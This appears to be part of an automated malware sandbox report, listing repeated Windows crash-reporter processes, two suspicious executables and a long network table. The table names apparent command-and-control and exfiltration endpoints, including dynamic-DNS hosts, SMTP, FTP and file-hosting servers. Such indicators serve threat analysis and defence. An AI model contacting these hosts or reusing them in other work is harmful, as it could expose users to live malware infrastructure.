C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2008
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\ProgramData\pinterests\XRJNZC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 2044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1992
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| DE | 136.243.104.235:443 | tcp | |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.177.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.129.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.104.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 131.253.33.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 200.33.253.131.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 88.221.24.24:443 | r.bing.com | tcp |
| NL | 88.221.24.24:443 | r.bing.com | tcp |
| NL | 88.221.24.83:443 | th.bing.com | tcp |
| NL | 88.221.24.83:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 24.24.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.24.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.76:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| DE | 172.217.23.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 110.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.46.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.46.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.130:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | datalake.abuse.ch | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | 48.202.162.178.in-addr.arpa | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | 6coinc.zapto.org | udp |
| BG | 91.92.244.198:6696 | 6coinc.zapto.org | tcp |
| US | 8.8.8.8:53 | 198.244.92.91.in-addr.arpa | udp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 212.62.237.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| US | 8.8.8.8:53 | 35.255.201.195.in-addr.arpa | udp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| US | 104.237.62.212:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | mail.ezexpress.net | udp |
| SG | 172.96.191.121:587 | mail.ezexpress.net | tcp |
| US | 8.8.8.8:53 | 121.191.96.172.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 22.71.37.193.in-addr.arpa | udp |
| US | 104.237.62.212:443 | api.ipify.org | tcp |
| US | 104.237.62.212:443 | api.ipify.org | tcp |
| SG | 172.96.191.121:587 | mail.ezexpress.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| US | 8.8.8.8:53 | mail.nmsltd.com.tr | udp |
| TR | 185.86.155.42:587 | mail.nmsltd.com.tr | tcp |
| US | 8.8.8.8:53 | 42.155.86.185.in-addr.arpa | udp |
| TR | 185.86.155.42:587 | mail.nmsltd.com.tr | tcp |
| US | 104.237.62.212:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | smtp.privateemail.com | udp |
| US | 66.29.159.53:587 | smtp.privateemail.com | tcp |
| US | 8.8.8.8:53 | 53.159.29.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.ercolina-usa.com | udp |
| US | 192.254.225.136:21 | ftp.ercolina-usa.com | tcp |
| US | 8.8.8.8:53 | 136.225.254.192.in-addr.arpa | udp |
| US | 192.254.225.136:36285 | ftp.ercolina-usa.com | tcp |
| US | 66.29.159.53:587 | smtp.privateemail.com | tcp |
| US | 192.254.225.136:35479 | ftp.ercolina-usa.com | tcp |
| US | 192.254.225.136:40359 | ftp.ercolina-usa.com | tcp |
| US | 192.254.225.136:41510 | ftp.ercolina-usa.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 37.20.181.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 188.114.96.0:443 | reallyfreegeoip.org | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | varders.kozow.com | udp |
| FR | 51.38.247.67:8081 | varders.kozow.com | tcp |
| US | 8.8.8.8:53 | aborters.duckdns.org | udp |
| FR | 51.38.247.67:8081 | aborters.duckdns.org | tcp |
| US | 8.8.8.8:53 | anotherarmy.dns.army | udp |
| FR | 51.38.247.67:8081 | anotherarmy.dns.army | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 67.247.38.51.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 59.6.85.104.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 13.42.107.13.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| KR | 38.6.193.13:8889 | udp | |
| KR | 192.186.7.211:2001 | 192.186.7.211 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 13.193.6.38.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 211.7.186.192.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 28.246.36.23.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
